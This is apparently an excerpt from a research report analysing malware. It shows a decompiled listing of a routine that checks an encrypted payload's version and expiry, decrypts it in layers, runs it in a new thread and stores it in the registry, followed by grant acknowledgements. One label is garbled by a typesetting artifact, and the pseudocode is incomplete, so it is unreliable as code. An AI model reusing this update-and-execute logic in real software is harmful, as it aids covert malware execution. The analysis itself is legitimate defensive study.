void iterative_payload_decrypt(payload_check *a1, int control) {
  payload_check *v2; 
  int expiration_date; 
  int current_version; 
  payload_check *v5; 
  payload_check *v6; 
  payload_check *v7; 
  int v8; 
  payload_check *v9; 
  int v10; 
  int v11; 
  payload_check *v12; 
  unsigned int v13; 
  int v14; 
  int received_version; 
  char *v16; 
  int v17; 
  int v18; 
  char v19; 
  int v20; 

  v16 = &v19;
  v2 = a1;
  EnterCriticalSection(...);
  v20 = 0;
  if (! check_payload_and_extract_header(v2)
      || (current_version  = get_payload_version(),
          received_version = extract_field_from_decrypted_header(v2, 0),
          expiration_date  = extract_field_from_decrypted_header(v5, 4),
          v13 = extract_field_from_decrypted_header(v6, 8),
          v14 = extract_field_from_decrypted_header(v7, 12),
         (received_version & 0x7FFFFFFFu) <= (current_version & 0x7FFFFFFFu))
      || global_time_variable + get_total_time_elapsed() >= (unsigned
         int)expiration_date )
         goto @bfseries$FREE MEMORY and EXIT#;
  if (control && v14 & 4 )
  {
      v9 = copy_payload_struc(v2);
      v12 = v9;
      while ((extract_field_from_decrypted_header(v9, 12) & 2) )
      {
          if (!(extract_field_from_decrypted_header(v9, 12) & 1) ||    
              ! further_decrypt_payload(v11, v9) )
              goto LABEL_9;
      }
      v18 = 0;
      v17 = 0;
      v16 = 0;
      received_version = 0;
      spawn_payload_thread((void *)(v9->size - 576), 1, (const void *)                           (v9->decrypted_payload + 64), 0, 0, 0, 0);
LABEL_9:
      free_payload_check_struct(&v12);
  }
  v10 = v13;
  if (!(v14 & 1) || v13 <= 0 ) {
      if (( v14 & 2 )  & !v13) {
          dword_9BBD30 = 0;
          variable_payload_version = received_version;
          clear_registry_value(4u, off_9B8DBE, 4);
          clear_registry_value(4u, off_9B9076, 5);
          variable_payload_check_struct = 0;
          store_encrypted_payload_in_registry_if_payload();
    }
    goto FREE MEMORY_and_EXIT;
  }
  if (!further_decrypt_payload(v8, v2) )  {
FREE MEMORY_and_EXIT:
      free_payload_check_struct(&a1);
      goto EXIT;
  }
  call_GlobalFree((HGLOBAL)v2->decrypted_payload);
  v2->decrypted_payload = 0;
  dword_9BBD30 = v10;
  variable_payload_version = received_version;
  clear_registry_value(4u, off_9B8DBE, 4);
  clear_registry_value(4u, off_9B9076, 5);
  free_payload_check_struct((void *)off_9B9844);
  variable_payload_check_struct = (int)v2;
  a1 = 0;
  store_encrypted_payload_in_registry_if_payload();
  free_payload_check_struct(&a1);
EXIT:
  LeaveCriticalSection(...);
}
SOURCE LISTING 19: Iterative payload decryption



 


 







Acknowledements

  This material is based upon work supported through the U.S. Army Research Office under the Cyber-TA Research Grant No. W911NF-06-1- 0316 and by the National Science Foundation, Grant No. CNS-07-16 612. The views expressed in this document are those of the authors and do not necessarily represent the official position of the sponsors.